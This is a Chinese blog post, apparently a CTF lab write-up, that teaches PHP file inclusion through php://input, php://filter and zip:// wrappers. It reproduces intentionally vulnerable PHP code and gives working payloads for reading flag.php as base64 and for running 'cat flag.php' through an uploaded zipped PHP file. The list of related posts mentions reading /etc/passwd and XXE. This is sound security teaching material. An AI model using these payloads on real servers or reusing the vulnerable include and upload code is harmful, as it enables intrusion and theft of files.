文件包含漏洞(1)

于 2024-08-25 23:06:35 发布
阅读量667 收藏 9
点赞数 10
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huizhaohaha/article/details/141535307
版权

目录

PHP伪协议

php://input

Example 1: 造成任意代码执行

Example 2: 文件内容绕过

php://filer

zip://

PHP伪协议

php://input

Example 1: 造成任意代码执行

搭建环境

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://filter") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
    exit('hacker!');
}
if($file){
    if ($file!="http://www.baidu.com") echo "tips:flag在当前目录的某个文件中";
    include($file);
}else{
    echo '<a href="?file=http://www.baidu.com">click go baidu</a>';
}
?>

直接点开看看

发现有file,我们的第一想法就是文件包含或者ssrf,由于这里的专题是文件包含,那显然就是文件包含了,接下来分析代码,发现file接受参数,但是过滤了一下伪协议,

但是我们发现并没有过滤php://input,那我们开始拿flag

在这个页面使用bp进行抓包

这样成功拿下flag

Example 2: 文件内容绕过

搭建环境

<?php
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}

分析代码,

当参数$a不为空,且读取的文件中包含’I want flag’时,即可显示$flag。所以可以使用php://input

开始拿flag

依然是使用bp进行抓包

成功拿下flag,其实这种直接显示源码的,我们只需要把源码分析清楚,就差不多思路就清晰了,可以快速地拿下flag。

php://filer

搭建环境

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
    exit('hacker!');
}
if($file){
    include($file);
}else{
    echo '<a href="?file=flag.php">tips</a>';
}
?>

分析代码,发现没有过滤php://filer,使用file进行传参,我们直接拿flag

?file=php://filter/read=convert.base64-encode/resource=flag.php

这是进行base64编码后的flag,我们只需要对其进行解码即可拿到flag

拿下flag

zip://

搭建环境

<?php
error_reporting(0);
$file = $_GET["file"];
if (!$file) echo '<a href="?file=upload">upload?</a>';
if(stristr($file,"input")||stristr($file, "filter")||stristr($file,"data")/*||stristr($file,"phar")*/){
    echo "hick?";
    exit();
}else{
    include($file.".php");
}
?>
<!-- flag在当前目录的某个文件中 -->

//upload.php
<meta charset="utf-8">
<form action="upload.php" method="post" enctype="multipart/form-data" >
     <input type="file" name="fupload" />
     <input type="submit" value="upload!" />
</form>
you can upload jpg,png,zip....<br />
<?php
if( isset( $_FILES['fupload'] ) ) {
    $uploaded_name = $_FILES[ 'fupload' ][ 'name' ];         //文件名
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);   //文件后缀
    $uploaded_size = $_FILES[ 'fupload' ][ 'size' ];         //文件大小
    $uploaded_tmp  = $_FILES[ 'fupload' ][ 'tmp_name' ];     // 存储在服务器的文件的临时副本的名称
    $target_path = "uploads/".md5(uniqid(rand())).".".$uploaded_ext;
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" || strtolower( $uploaded_ext ) == "zip" ) &&
        ( $uploaded_size < 100000 ) ) {
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {// No
            echo '<pre>upload error</pre>';
        }
        else {// Yes!
            echo "<pre>".dirname(__FILE__)."\\{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        echo '<pre>you can upload jpg,png,zip....</pre>';
    }
}
 ?>

分析代码,file进行接收传参,同时过滤了这些伪协议

下面这段代码是上传upload的form表单

下面这段这段代码是接收upload的功能

开始拿flag,这一题很明显,没有过滤zip://伪协议,同时它还可以上传文件,拿我们首先创建一个php文件并且对其进行压缩

进行文件上传

文件上传路径中需要把/修改为\,(每个人的路径都不一样,注意用自己的路径)

?file=zip:///home/centos/nginx/html/include/uploads/665908a9ab398f33baa832e6c99d5d24.zip%23web&abc=cat%20flag.php

拿下flag

今天就到这里了。

稚锦
关注
文件包含漏洞
qq_52016943的博客
08-17 2581
文件包含漏洞
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web网站文件包含漏洞和攻击-运维安全详细笔记总结
fileclude(文件包含漏洞php://inputphp://filter的使用)
Welcome To Myon'Blog !
04-16 4757
fileclude、文件包含漏洞php://inputphp://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
iwebsec靶场文件包含漏洞-php://input伪协议及利用
qq_56041380的博客
04-05 706
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。
bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过
YouthBelief的博客
03-07 3082
bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页 及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页 及源码 发现一个页面 访问 1.2 访问1p.html 自动跳转到主页 直接查看源码 得到JS代码 其中申明 words变量 和OutWord()方法 将 escape解码后的words变量写入页面中。 words 变量 经过 url编码
【网络安全篇】php伪协议-漏洞及其原理
qq_53058639的博客
01-29 822
🏆今日学习目标:🍀学习php伪协议✅创作者:贤鱼⏰预计时间:35分钟🍁贤鱼的个人社区,欢迎你的加入🍁如果有需要可以查看下面文章。
【基础篇】第05篇:PHP代码审计笔记--文件包含漏洞1
08-03
1. **远程文件包含(Remote File Inclusion, RFI)**:攻击者通过URL指定外部服务器上的文件来执行。 2. **本地文件包含(Local File Inclusion, LFI)**:攻击者通过修改程序中的文件路径来读取服务器上的敏感文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞的防御措施主要包括:限制文件包含的来源,确保只包含预期的、安全的文件;使用绝对路径而非相对路径,防止意外包含其他目录的文件;禁用不必要的文件包含功能,如`allow_url_fopen`;对用户输入进行...
文件包含漏洞(一)
不秃头的程序Yang
06-29 1530
二、常见文件包含函数 三、代码分析 四、利用方法 五、本地文件包含 1、文件包含/etc/passwd 3.2 搭建测试环境 3.3 抓包测试 文件包含图片 包含日志文件getshell 包含环境变量getshell
php input 漏洞,php://inputphp://filter,data URI schema的那些事
weixin_36400833的博客
03-11 1714
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用...
文件包含漏洞input、filter、zip)
m0_70349048的博客
03-17 1526
可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。先访问这个页面然后抓包进行上传并访问恶意代码,可以看到phpinfo()已经执行。
php伪协议语法,php文件包含漏洞input与filter)
weixin_39881167的博客
03-10 1664
php://inputphp://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。php://filter协议协议语法:php://filter:/=php://filter 的 参数列表read      ...
文件包含漏洞(2), 伪协议, php://filter, php://input
探测???
10-25 291
文件包含php代码后, 会自动被web引擎解释执行, 如果想查看源码而不是执行, 则可以使用这个协议.功能: phar用于对压缩文件的读取, 配合文件上传漏洞, 或phar反序列化漏洞.的源码, 并用base64编码显示. 通过base64解码即可得到php代码.php.ini配置文件中 allow_url_fopen=On 是开启状态.与phar功能相同, 但是不能读取包含多级目录的压缩包.参数用户可控, 且没有对包含的文件进行过滤和限制.通过该phar可以直接访问zip内的txt文件.
ctfshow web78 获取flag(用老版的火狐浏览器)
最新发布
XiaoYeZhu_1314的博客
04-28 430
第一种:利用input伪协议 ,获取到flag。第二种:利用flter协议,获取到flag。第三种:利用data 协议 获取到fag。
PHP环境 XML外部实体注入漏洞(XXE)
EC_Carrot的博客
07-19 1012
漏洞简介 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡,这里用libxml2.8.0版本编译进PHP中来复现。 漏洞复现 Simple XXE Payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> &lt
命令执行漏洞学习
Wawyw's Blog
05-31 720
1、概述 产生原因: 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成命令来执行。 危害: 继承Web服务程序的权限去执行系统命令或读写文件 反弹shell,获得目标服务器的权限 进一步内网渗透 2、远程命令执行 在PHP中,有时候需要调用一些执行命令的函数,如:eval()、assert()、preg_replace()、create_function()等,如果存在一个使用这些函数且未对可被用户控制的参数进行检查过滤的页面,那么这个页面就有可能存在远程命令执行漏洞。 2.1、eval()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值